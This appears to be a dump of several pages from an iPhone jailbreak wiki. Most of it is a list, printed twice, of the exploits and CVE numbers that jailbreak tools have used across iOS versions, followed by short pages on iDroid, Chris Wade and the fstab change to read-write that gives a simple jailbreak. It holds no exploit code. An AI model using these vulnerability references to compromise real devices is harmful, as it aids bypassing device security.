=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]]
* [[Timezone Vulnerability]] ({{cve|2013-0979}})
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.6 beta)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

===[[unc0ver]] (14.0 - 14.3)===

* ivac entry use-after-free ({{cve|2021-1782}})

Android

2021-04-30T02:25:39Z

Inflatable Man: /* Links */ Added Project Sandcastle as a link.

[[Image:Android_logo.png|150px|right]]
== Links ==
=== iDroid Resources ===
*[http://www.idroidproject.org/wiki/Main_Page iDroid Project]
*[[iPhoneLinux]]
*[http://www.idroidproject.org/wiki/Frequently_Asked_Questions iPhoneLinux FAQ]
*[http://www.idroidproject.org/wiki/Installing_iDroid Installing iDroid]
=== Project Sandcastle ===
*[https://projectsandcastle.org Project Sandcastle]
=== Related Information ===
*[[Jailbreaking]]
*[[PwnageTool]]
*[[Sn0wbreeze]]
*[[WinPwn]]
*[[OpeniBoot]]
=== Helping Out ===
*[http://www.idroidproject.org/wiki/ToDo iPhoneLinux To-Do]
*[[Porting OpeniBoot]]
*[http://www.idroidproject.org/wiki/Frequently_Asked_Questions iPhoneLinux FAQ]
*[http://www.idroidproject.org/wiki/ToDo iPhoneLinux To-Do]
*[http://www.idroidproject.org/wiki/Installing_iDroid Installing iDroid]

== See Also ==
* [[iDroid]]

[[Category:Android on iPhone]]

Cmw

2021-04-30T02:22:13Z

Inflatable Man: Added that Chris Wade no longer works on iEmu and now works on Corellium.

{{lowercase}}
Chris Wade (aka cmw or Niacin) is the creator of [[WinPwn]] and the first to use the [[LibTiff]] exploit to [[jailbreak]] the iPhone 1.1.1 OS. He worked on [[iEmu]], an [[iOS]] emulator. He is currently working on Corellium, a program that can virtualize ARM devices.

=== Links ===
*[http://twitter.com/cmwdotme Twitter]
*[https://github.com/cmwdotme Github]
*[http://www.cmw.me Homepage]

[[Category:Hackers]]

/private/etc/fstab

2021-04-25T18:29:38Z

Inflatable Man: Added that fstab was removed in iOS 14.

fstab controls the read/write access of the root and media partitions. A barebones jailbreak can be put in place simply by modifying this file to grant full read/write access to the [[/|root partition]] ([[/dev/disk0s1s1]]). fstab was removed in iOS 14.

== File Contents ==
Note the empty line. This is required for the file to be parsed correctly.
=== Before [[jailbreak]] ===
[[/dev/disk0s1s1]] / hfs ro 0 1
[[/dev/disk0s1s2]] /private/var hfs,nosuid,nodev rw 0 2

=== After jailbreak ===
/dev/disk0s1s1 / hfs rw 0 1
/dev/disk0s1s2 /private/var hfs,nosuid,nodev rw 0 2

== Parents ==
{{parent|private|etc}}

[[Category:Ramdisk Patches]]

Jailbreak Exploits

2021-04-17T23:38:45Z

Inflatable Man: /* evasi0n (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) */ Fix CVE (according to https://www.theiphonewiki.com/wiki/Timezone_Vulnerability and https://support.apple.com/en-us/HT202706)

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]]
* [[Timezone Vulnerability]] ({{cve|2013-0979}})
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

